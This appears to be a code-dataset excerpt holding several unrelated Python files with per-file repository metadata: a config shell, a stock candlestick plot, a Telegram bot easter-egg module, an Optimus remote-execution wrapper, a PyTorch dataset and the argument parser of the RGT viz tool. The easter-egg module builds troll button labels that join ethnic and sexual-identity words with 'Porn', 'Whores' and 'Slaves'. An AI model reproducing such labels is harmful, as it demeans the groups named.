config.read(config_file)
config['FORMAT'] = dict((format_keys[ans], format_opts[format_keys[ans]]) \
for ans in answers)
with open(config_file, "w") as fmtFile:
config.write(fmtFile)
## Set the Editor
def set_editor():
editor_opts = {"Vim":"vim ", "VSCode":"start code ",
"Notepad++":"Notepad++", "Sublime Text": "subl", "Atom":"atom"}
print(colored('Editor selection (should be launchable from terminal)', 'yellow'))
print(colored('Choose editor (use up/down keys):', 'yellow'))
editor_keys = list(editor_opts.keys())
answer = cutie.select(editor_keys, selected_index=0)
## Store the config file
config = configparser.ConfigParser()
home = os.path.expanduser("~")
config_file = os.path.join(home, "codecomb_config.ini")
config.read(config_file)
config['EDITOR'] = {"startcmd": editor_opts[editor_keys[answer]]}
with open(config_file, "w") as fmtFile:
config.write(fmtFile)
def config_shell():
#os.system("cls")
#os.system("clear")
set_format()
set_editor()
if __name__ == "__main__":
config_shell() | 23.226667 | 82 | 0.702641 | 233 | 1,742 | 5.090129 | 0.373391 | 0.067454 | 0.053963 | 0.021922 | 0.337268 | 0.305228 | 0.305228 | 0.305228 | 0.305228 | 0.305228 | 0 | 0.000668 | 0.141217 | 1,742 | 75 | 83 | 23.226667 | 0.792112 | 0.08209 | 0 | 0.355556 | 0 | 0 | 0.189666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.177778 | 0 | 0.244444 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41757415060bd40b7bf8385c7ab3e828141ce2df | 637 | py | Python | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
] | null | null | null | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
] | null | null | null | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as fig
import datetime as dt
import mpl_finance as mpf
import matplotlib.dates as mdates
import pandas_datareader.data as web
inicio=dt.datetime(2019,1,1)
fim=dt.datetime(2022,2,2)
df=web.DataReader('MGLU3.SA','yahoo',inicio,fim)
df['med_mov']=df['Close'].rolling(window=20,min_periods=0).mean()
df_ohlc=df['Close'].resample('7D').ohlc()
df_ohlc['Volume']=df['Volume'].resample('7D').sum()
df_ohlc.reset_index(inplace=True)
df_ohlc['Date']=df_ohlc['Date'].map(mdates.date2num)
ax1=fig.subplot(211)
ax1.xaxis_date()
mpf.candlestick_ohlc(ax1,df_ohlc.values,width=2,colorup='g')
ax1.plot(df.index,df['med_mov']) | 30.333333 | 65 | 0.758242 | 112 | 637 | 4.1875 | 0.517857 | 0.076759 | 0.034115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044851 | 0.054945 | 637 | 21 | 66 | 30.333333 | 0.734219 | 0 | 0 | 0 | 0 | 0 | 0.097179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.294118 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4177179531f58a2be53761395add53901bd1e218 | 1,901 | py | Python | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | import random
from pprint import pprint
from peewee import fn
from model import Bot
from telegram import ReplyKeyboardMarkup
import util
from telegram import KeyboardButton
import captions
from model import track_activity
@track_activity('easteregg', '"crappy troll markup"')
def _crapPy_Tr0ll_kbmarkup(rows=None):
if rows is None:
rows = 4
first = ['Gay', 'Pony', 'Dick', 'Telegram', 'Milk', 'WhatsApp', 'Daniils', 'T3CHNOs', 'Adult', 'ThirdWorld',
'Asian', 'Mexican', 'SM', 'Russian', 'Chinese', 'Gonzo', 'Anime']
second = ['Tales', 'Porn', 'Rice', 'Bugs', 'Whores', 'Pigs', 'Alternatives', 'Pics', 'Penetrator', 'Addiction',
'Ducks', 'Slaves']
third = ['Collection', 'Channel', 'Bot', 'Radio', 'Chat', 'Discuss ion', 'Conversation', 'Voting', 'ForPresident']
def compound():
choices = [
'{} {} {}'.format(random.choice(first), random.choice(second), random.choice(third)),
'@{}{}{}'.format(random.choice(first), random.choice(second), ''.join(random.choice(third).split(' '))),
]
return random.choice(choices)
buttons = [[KeyboardButton(compound()) for x in range(2)] for y in range(rows)]
return buttons
def send_next(bot, update, args=None):
uid = util.uid_from_update(update)
rows = None
if args:
try:
rows = int(args[0])
except:
rows = None
reply_markup = ReplyKeyboardMarkup(_crapPy_Tr0ll_kbmarkup(rows), one_time_keyboard=True, per_user=True)
text = 'ɹoʇɐɹǝuǝb ǝɯɐuɹǝsn ɯɐɹbǝןǝʇ'
util.send_md_message(bot, uid, text, reply_markup=reply_markup)
def send_random_bot(bot, update):
from components.explore import send_bot_details
random_bot = Bot.select().where((Bot.approved == True), (Bot.description.is_null(False))).order_by(fn.Random()).limit(1)[0]
send_bot_details(bot, update, random_bot) | 34.563636 | 127 | 0.652288 | 229 | 1,901 | 5.28821 | 0.50655 | 0.069364 | 0.024773 | 0.037985 | 0.067713 | 0.067713 | 0.067713 | 0 | 0 | 0 | 0 | 0.005219 | 0.193582 | 1,901 | 55 | 128 | 34.563636 | 0.784736 | 0 | 0 | 0.04878 | 0 | 0 | 0.165089 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.243902 | 0 | 0.390244 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
417d85f2f2634da06e6ff80737c0f455994abeac | 5,398 | py | Python | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | from pandas import DataFrame as PandasDataFrame
from optimus.engines.base.basedataframe import BaseDataFrame
class RemoteDummyAttribute:
def __init__(self, name, names, dummy_id, op):
self.__names = [*names, name]
self.__op = op
self.__id = dummy_id
def __getattr__(self, item):
return RemoteDummyAttribute(item, self.__names, self.__id, self.__op)
def __call__(self, *args, **kwargs):
if kwargs.get("client_submit"):
client_submit = kwargs["client_submit"]
del kwargs["client_submit"]
else:
client_submit = False
def _f(op, unique_id, method, *args, **kwargs):
obj = op.get_var(unique_id)
if obj is None:
op.del_var(unique_id)
raise Exception("Remote variable with id " + unique_id + " not found or null")
func = obj
for me in method:
func = getattr(func, me)
if callable(func):
result = func(*args, **kwargs)
else:
result = func
return result
if client_submit:
return self.__op.remote_submit(_f, self.__id, self.__names, *args, **kwargs)
else:
return self.__op.remote_run(_f, self.__id, self.__names, *args, **kwargs)
class RemoteDummyVariable:
def __init__(self, op, unique_id, *args, **kwargs):
self.op = op
self.id = unique_id
def __getattr__(self, item):
if item.startswith('_'):
raise AttributeError(item)
return RemoteDummyAttribute(item, [], self.id, self.op)
def __getstate__(self):
return {"op": self.op, "id": self.id}
def __setstate__(self, d):
self.op = d.op
self.id = d.id
return
def __del__(self):
self.op.remote.del_var(self.id).result(180)
class RemoteDummyDataFrame(RemoteDummyVariable):
print = BaseDataFrame.print
table = BaseDataFrame.table
display = BaseDataFrame.display
def __repr__(self):
return self.ascii()
def _repr_html_(self):
return self.table()
@property
def meta(self):
def _get_attr(op, unique_id, attr):
df = op.get_var(unique_id)
if df is None:
op.del_var(unique_id)
raise Exception("Remote variable with id " + unique_id + " not found or null")
return getattr(df, attr)
return self.op.remote_run(_get_attr, self.id, "meta")
class ClientActor:
op = {}
_vars = {}
_del_next = []
def __init__(self, engine=False):
if not engine:
from optimus.optimus import Engine
engine = Engine.DASK.value
from optimus import Optimus
self.op = Optimus(engine)
self.op.set_var = self.set_var
self.op.get_var = self.get_var
self.op.del_var = self.del_var
self.op.list_vars = self.list_vars
self.op.update_vars = self.update_vars
self.set_var("_load", self.op.load)
self.set_var("_create", self.op.create)
def list_vars(self):
return list(self._vars.keys())
def update_vars(self, values):
self._vars.update(values)
def _del_var(self, name):
try:
del self._vars[name]
except:
print(name + " not found")
def del_var(self, name):
for _name in self._del_next:
self._del_var(_name)
self._del_next = []
if not name.startswith("_"):
if self._vars[name] is None:
print(name + " not found")
else:
self._del_next.append(name)
def set_var(self, name, value):
self._vars[name] = value
def get_var(self, name):
return self._vars.get(name, None)
def _return(self, value):
import cupy as cp
import numpy as np
if isinstance(value, (dict,)):
for key in value:
value[key] = self._return(value[key])
return value
elif isinstance(value, (list,)):
return list(map(self._return, value))
elif isinstance(value, (set,)):
return set(map(self._return, value))
elif isinstance(value, (tuple,)):
return tuple(map(self._return, value))
elif isinstance(value, (PandasDataFrame,)):
return value.head()
elif not isinstance(value, (str, bool, int, float, complex, np.generic, cp.generic)) and value is not None:
import uuid
unique_id = str(uuid.uuid4())
self.set_var(unique_id, value)
if isinstance(value, (BaseDataFrame,)):
return {"dummy": unique_id, "dataframe": True}
else:
return {"dummy": unique_id, "dataframe": False}
else:
return value
def submit(self, callback, *args, **kwargs):
try:
result = callback(self.op, *args, **kwargs)
except Exception as err:
import traceback
error_class = err.__class__.__name__
detail = err.args[0]
tb = traceback.format_exc()
error = "%s: %s\n%s" % (error_class, detail, tb)
return {"status": "error", "error": error}
return self._return(result) if result is not None else None
| 30.156425 | 115 | 0.567803 | 646 | 5,398 | 4.490712 | 0.190402 | 0.041365 | 0.018959 | 0.034471 | 0.235436 | 0.122372 | 0.109962 | 0.053775 | 0.053775 | 0.053775 | 0 | 0.001372 | 0.32475 | 5,398 | 178 | 116 | 30.325843 | 0.794513 | 0 | 0 | 0.128571 | 0 | 0 | 0.040571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157143 | false | 0 | 0.057143 | 0.042857 | 0.45 | 0.021429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
417e3d6a00fec073fc8e5b110ada2e2d5309582c | 1,919 | py | Python | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | import torch as T
import numpy as np
from app.util.ML.constants import *
DEVICE = T.device("cpu")
GPU_ENABLED = False
class DeviceMeterDataset(T.utils.data.Dataset):
@staticmethod
def createDatasets(device_id, mul_factor=1):
allData = np.load(BASE_PATH + TRAIN_FOLDER + DEVICE_BASE_NAME + str(device_id) + ".npy")
data_length = allData.shape[0]
used_data = min(data_length // 2, 50000)
increasing_factor = min(int(data_length * 2 / 10), 8000)
np.random.shuffle(allData)
ans = {
"train": DeviceMeterDataset(allData[:used_data], mul_factor),
"validation": DeviceMeterDataset(allData[used_data:used_data + increasing_factor], mul_factor),
"test": DeviceMeterDataset(allData[used_data + increasing_factor:used_data + 2 * increasing_factor],
mul_factor)
}
return ans
# we need to generate mean error to have a comparasion basis for anomaly detections
@staticmethod
def createEvalData(device_id, mul_factor=1):
allData = np.load(BASE_PATH + TRAIN_FOLDER + DEVICE_BASE_NAME + str(device_id) + ".npy")
index = np.random.choice(allData.shape[0], 1000, replace=False)
max_index = allData.shape[0] - 12
index = index[index < max_index]
evalData = []
for id in index:
evalData.append(allData[id:id + 12, :].copy())
for data in evalData:
data[:, 3] *= mul_factor
return evalData
def __init__(self, data, mul_factor=1):
self.allData = data
self.allData[:, 3] *= mul_factor
self.xy_data = T.tensor(self.allData, dtype=T.float32).to(DEVICE)
def __len__(self):
return len(self.xy_data)
def __getitem__(self, idx):
data = self.xy_data[idx, :3]
value = self.xy_data[idx, 3].reshape((1))
return data, value
| 31.983333 | 112 | 0.625847 | 244 | 1,919 | 4.709016 | 0.368852 | 0.062663 | 0.034813 | 0.086162 | 0.160139 | 0.13577 | 0.13577 | 0.13577 | 0.13577 | 0.13577 | 0 | 0.024788 | 0.2642 | 1,919 | 59 | 113 | 32.525424 | 0.788952 | 0.042209 | 0 | 0.095238 | 0 | 0 | 0.016349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119048 | false | 0 | 0.071429 | 0.02381 | 0.309524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
417fc0767f9f3045bfabe98057d3d6ae8df77d25 | 59,087 | py | Python | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | # Python Libraries
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import getpass
import argparse
import datetime
import matplotlib
matplotlib.use('Agg', warn=False)
from .boxplot import Boxplot
from .lineplot import Lineplot
from .jaccard_test import Jaccard
from .projection_test import Projection
from .intersection_test import Intersect
from .bed_profile import BedProfile
from .shared_function import check_dir, print2, output_parameters, \
copy_em, list_all_index, output
from .plotTools import Venn
from .. import __version__
current_dir = os.getcwd()
"""
Statistical analysis methods and plotting tools for ExperimentalMatrix
Author: Joseph C.C. Kuo
"""
def main():
###############################################################################
##### PARAMETERS ##############################################################
###############################################################################
# Some general help descriptions
######### Some general plotting arguments descriptions ###############
helpinput = 'The file name of the input Experimental Matrix file. Recommended to add more columns for more information for ploting. For example, cell type or factors. (default: %(default)s)'
helpoutput = 'The directory name for the output files. For example, project name. (default: %(default)s)'
helptitle = 'The title shown on the top of the plot and also the folder name. (default: %(default)s)'
helpgroup = "Group the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpgroupbb = "Group the data by any optional column (for example, 'cell') of experimental matrix, or None. (default: %(default)s)"
helpsort = "Sort the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpcolor = "Color the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpcolorbb = "Color the data by any optional column (for example, 'cell') of experimental matrix, or None. (default: %(default)s)"
help_define_color = 'Define the specific colors with the given column "color" in experimental matrix. The color should be in the format of matplotlib.colors. For example, "r" for red, "b" for blue, or "(100, 35, 138)" for RGB. (default: %(default)s)'
helpreference = 'The file name of the reference Experimental Matrix. Multiple references are acceptable. (default: %(default)s)'
helpquery = 'The file name of the query Experimental Matrix. Multiple queries are acceptable. (default: %(default)s)'
helpcol = "Group the data in columns by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helprow = "Group the data in rows by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpmp = "Define the number of cores for parallel computation. (default: %(default)s)"
version_message = "viz - Regulatory Analysis Toolbox (RGT). Version: " + str(__version__)
parser = argparse.ArgumentParser(description='Provides various Statistical analysis methods and plotting tools for ExperimentalMatrix.\
\nAuthor: Joseph C.C. Kuo, Ivan Gesteira Costa Filho', formatter_class=argparse.ArgumentDefaultsHelpFormatter,
add_help=True, version=version_message)
subparsers = parser.add_subparsers(help='sub-command help', dest='mode')
################### BED profile ##########################################
parser_bedprofile = subparsers.add_parser('bed_profile',
help='BED profile analyzes the given BED file(s) by their length, distribution and composition of the sequences.')
parser_bedprofile.add_argument('-i', metavar=' ',
help="Input experimental matrix or Input BED file or Input directory which contains BED files")
parser_bedprofile.add_argument('-o', metavar=' ', help=helpoutput)
parser_bedprofile.add_argument('-t', metavar=' ', default='bed_profile', help=helptitle)
parser_bedprofile.add_argument('-organism', metavar=' ', default=None,
help='Define the organism. (default: %(default)s)')
parser_bedprofile.add_argument('-biotype', metavar=' ', default=False,
help='Define the directory for biotype BED files.')
parser_bedprofile.add_argument('-repeats', metavar=' ', default=False,
help='Define the directory for repeats BED files.')
parser_bedprofile.add_argument('-genposi', metavar=' ', default=False,
help='Define the directory for the generic position BED files. (exons, introns, and intergenic regions)')
parser_bedprofile.add_argument('-labels', metavar=' ', default=None, help='Define the labels for more BED sets')
parser_bedprofile.add_argument('-sources', metavar=' ', default=None,
help='Define the directories for more BED sets corresponding to the labels')
parser_bedprofile.add_argument('-strand', metavar=' ', default=None,
help='Define whether to perform strand-specific comparison for each reference corresponding to the labels (T or F)')
parser_bedprofile.add_argument('-other', metavar=' ', default=None,
help='Define whether to count "else" for each reference corresponding to the labels (T or F)')
parser_bedprofile.add_argument('-background', metavar=' ', default=None,
help='Add the background to the first row of the figures (T or F)')
parser_bedprofile.add_argument('-coverage', action="store_true", default=False,
help='Calculate the overlapping region by coverage in bp instead of simple counting')
parser_bedprofile.add_argument('-test', action="store_true", default=False,
help='test script')
################### Projection test ##########################################
parser_projection = subparsers.add_parser('projection',
help='Projection test evaluates the association level by comparing to the random binomial model.')
parser_projection.add_argument('-r', metavar=' ', help=helpreference)
parser_projection.add_argument('-q', metavar=' ', help=helpquery)
parser_projection.add_argument('-o', metavar=' ', help=helpoutput)
parser_projection.add_argument('-t', metavar=' ', default='projection_test', help=helptitle)
parser_projection.add_argument('-g', metavar=' ', default=None, help=helpgroupbb)
parser_projection.add_argument('-c', metavar=' ', default="regions", help=helpcolorbb)
parser_projection.add_argument('-bg', metavar=' ', type=str, default=None,
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_projection.add_argument('-union', action="store_true",
help='Take the union of references as background for binominal test. (default: %(default)s)')
parser_projection.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_projection.add_argument('-log', action="store_true",
help='Set y axis of the plot in log scale. (default: %(default)s)')
parser_projection.add_argument('-color', action="store_true", help=help_define_color)
parser_projection.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_projection.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_projection.add_argument('-bed', action="store_true", default=False,
help='Output BED files for the regions of query which overlap the reference. (default: %(default)s)')
parser_projection.add_argument('-pw', metavar=' ', type=int, default=5,
help='Define the width of single panel. (default: %(default)s)')
parser_projection.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_projection.add_argument('-cfp', metavar=' ', type=float, default=0,
help='Define the cutoff of the proportion. (default: %(default)s)')
parser_projection.add_argument('-load', action="store_false", default=True,
help='Load the BED files later during processing, which saves memory usage when dealing with large number of BED files.')
################### Intersect Test ##########################################
parser_intersect = subparsers.add_parser('intersect',
help='Intersection test provides various modes of intersection to test the association between references and queries.')
parser_intersect.add_argument('-r', metavar=' ', help=helpreference)
parser_intersect.add_argument('-q', metavar=' ', help=helpquery)
parser_intersect.add_argument('-o', help=helpoutput)
parser_intersect.add_argument('-t', metavar=' ', default='intersection_test', help=helptitle)
parser_intersect.add_argument('-g', metavar=' ', default=None, help=helpgroupbb)
parser_intersect.add_argument('-c', metavar=' ', default="regions", help=helpcolorbb)
parser_intersect.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_intersect.add_argument('-bg', metavar=' ',
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_intersect.add_argument('-m', metavar=' ', default="count", choices=['count', 'bp'],
help="Define the mode of calculating intersection. 'count' outputs the number of overlapped regions.'bp' outputs the coverage(basepair) of intersection. (default: %(default)s)")
parser_intersect.add_argument('-tc', metavar=' ', type=int, default=False,
help="Define the threshold(in percentage) of reference length for intersection counting. For example, '20' means that the query which overlaps more than 20%% of reference is counted as intersection. (default: %(default)s)")
parser_intersect.add_argument('-ex', metavar=' ', type=int, default=0,
help="Define the extension(in bp) of reference length for intersection counting. For example, '20' means that each region of reference is extended by 20 bp in order to include proximal queries. (default: %(default)s)")
parser_intersect.add_argument('-log', action="store_true", help='Set y axis of the plot in log scale.')
parser_intersect.add_argument('-color', action="store_true", help=help_define_color)
parser_intersect.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_intersect.add_argument('-stest', metavar=' ', type=int, default=0,
help='Define the repetition time of random subregion test between reference and query. (default: %(default)s)')
parser_intersect.add_argument('-mp', metavar=' ', default=4, type=int, help=helpmp)
parser_intersect.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_intersect.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Jaccard test ##########################################
parser_jaccard = subparsers.add_parser('jaccard',
help='Jaccard test evaluates the association level by comparing with jaccard index from repeating randomization.')
parser_jaccard.add_argument('-o', help=helpoutput)
parser_jaccard.add_argument('-r', metavar=' ', help=helpreference)
parser_jaccard.add_argument('-q', metavar=' ', help=helpquery)
parser_jaccard.add_argument('-t', metavar=' ', default='jaccard_test', help=helptitle)
parser_jaccard.add_argument('-rt', metavar=' ', type=int, default=500,
help='Define how many times to run the randomization. (default: %(default)s)')
parser_jaccard.add_argument('-g', default=None, help=helpgroupbb)
parser_jaccard.add_argument('-c', default="regions", help=helpcolorbb)
parser_jaccard.add_argument('-organism', default='hg19', help='Define the organism. (default: %(default)s)')
parser_jaccard.add_argument('-nlog', action="store_false",
help='Set y axis of the plot not in log scale. (default: %(default)s)')
parser_jaccard.add_argument('-color', action="store_true", help=help_define_color)
parser_jaccard.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_jaccard.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_jaccard.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_jaccard.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Combinatorial Test ##########################################
parser_combinatorial = subparsers.add_parser('combinatorial',
help='Combinatorial test compare all combinatorial possibilities from reference to test the association between references and queries.')
parser_combinatorial.add_argument('-o', help=helpoutput)
parser_combinatorial.add_argument('-r', metavar=' ', help=helpreference)
parser_combinatorial.add_argument('-q', metavar=' ', help=helpquery)
parser_combinatorial.add_argument('-t', metavar=' ', default='combinatorial_test', help=helptitle)
parser_combinatorial.add_argument('-g', default=None, help=helpgroupbb)
parser_combinatorial.add_argument('-c', default="regions", help=helpcolorbb)
parser_combinatorial.add_argument('-organism', default='hg19', help='Define the organism. (default: %(default)s)')
parser_combinatorial.add_argument('-bg',
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_combinatorial.add_argument('-m', default="count", choices=['count', 'bp'],
help="Define the mode of calculating intersection. 'count' outputs the number of overlapped regions.'bp' outputs the coverage(basepair) of intersection. (default: %(default)s)")
parser_combinatorial.add_argument('-tc', type=int, default=False,
help="Define the threshold(in percentage) of reference length for intersection counting. For example, '20' means that the query which overlaps more than 20%% of reference is counted as intersection. (default: %(default)s)")
parser_combinatorial.add_argument('-ex', type=int, default=0,
help="Define the extension(in percentage) of reference length for intersection counting. For example, '20' means that each region of reference is extended by 20%% in order to include proximal queries. (default: %(default)s)")
parser_combinatorial.add_argument('-log', action="store_true",
help='Set y axis of the plot in log scale. (default: %(default)s)')
parser_combinatorial.add_argument('-color', action="store_true", help=help_define_color)
parser_combinatorial.add_argument('-venn', action="store_true",
help='Show the Venn diagram of the combinatorials of references. (default: %(default)s)')
parser_combinatorial.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_combinatorial.add_argument('-stest', type=int, default=0,
help='Define the repetition time of random subregion test between reference and query. (default: %(default)s)')
parser_combinatorial.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_combinatorial.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Boxplot ##########################################
parser_boxplot = subparsers.add_parser('boxplot',
help='Boxplot based on the BAM and BED files for gene association analysis.')
parser_boxplot.add_argument('input', help=helpinput)
parser_boxplot.add_argument('-o', metavar=' ', help=helpoutput)
parser_boxplot.add_argument('-t', metavar=' ', default='boxplot', help=helptitle)
parser_boxplot.add_argument('-g', metavar=' ', default='reads', help=helpgroup)
parser_boxplot.add_argument('-c', metavar=' ', default='regions', help=helpcolor)
parser_boxplot.add_argument('-s', metavar=' ', default='None', help=helpsort)
parser_boxplot.add_argument('-scol', action="store_true", help="Share y axis among columns. (default: %(default)s)")
parser_boxplot.add_argument('-nlog', action="store_false",
help='Set y axis of the plot not in log scale. (default: %(default)s)')
parser_boxplot.add_argument('-color', action="store_true", help=help_define_color)
parser_boxplot.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_boxplot.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_boxplot.add_argument('-nqn', action="store_true",
help='No quantile normalization in calculation. (default: %(default)s)')
parser_boxplot.add_argument('-df', action="store_true",
help="Show the difference of the two signals which share the same labels.The result is the subtraction of the first to the second. (default: %(default)s)")
parser_boxplot.add_argument('-ylim', metavar=' ', type=int, default=None,
help="Define the limit of y axis. (default: %(default)s)")
parser_boxplot.add_argument('-p', metavar=' ', type=float, default=0.05,
help='Define the significance level for multiple test. (default: %(default)s)')
parser_boxplot.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_boxplot.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
################### Lineplot ##########################################
parser_lineplot = subparsers.add_parser('lineplot', help='Generate lineplot with various modes.')
choice_center = ['midpoint', 'bothends', 'upstream', 'downstream']
# Be consist as the arguments of GenomicRegionSet.relocate_regions
parser_lineplot.add_argument('input', help=helpinput)
parser_lineplot.add_argument('-o', help=helpoutput)
parser_lineplot.add_argument('-ga', action="store_true",
help="Use genetic annotation data as input regions (e.g. TSS, TTS, exons and introns) instead of the BED files in the input matrix.")
parser_lineplot.add_argument('-t', metavar=' ', default='lineplot', help=helptitle)
parser_lineplot.add_argument('-center', metavar=' ', choices=choice_center, default='midpoint',
help='Define the center to calculate coverage on the regions. Options are: ' + ', '.join(
choice_center) + '. (default: %(default)s) The bothend mode will flap the right end region for calculation.')
parser_lineplot.add_argument('-g', metavar=' ', default='None', help=helpgroup)
parser_lineplot.add_argument('-row', metavar=' ', default='None', help=helprow)
parser_lineplot.add_argument('-col', metavar=' ', default='regions', help=helpcol)
parser_lineplot.add_argument('-c', metavar=' ', default='reads', help=helpcolor)
parser_lineplot.add_argument('-e', metavar=' ', type=int, default=2000,
help='Define the extend length of interested region for plotting. (default: %(default)s)')
parser_lineplot.add_argument('-rs', metavar=' ', type=int, default=200,
help='Define the readsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-ss', metavar=' ', type=int, default=50,
help='Define the stepsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-bs', metavar=' ', type=int, default=100,
help='Define the binsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-log', action="store_true",
help="Take log for the value before calculating average. (default: %(default)s)")
parser_lineplot.add_argument('-scol', action="store_true",
help="Share y axis among columns. (default: %(default)s)")
parser_lineplot.add_argument('-srow', action="store_true", help="Share y axis among rows. (default: %(default)s)")
parser_lineplot.add_argument('-organism', metavar=' ',
help='Define the organism. (default: %(default)s)')
parser_lineplot.add_argument('-color', action="store_true", help=help_define_color)
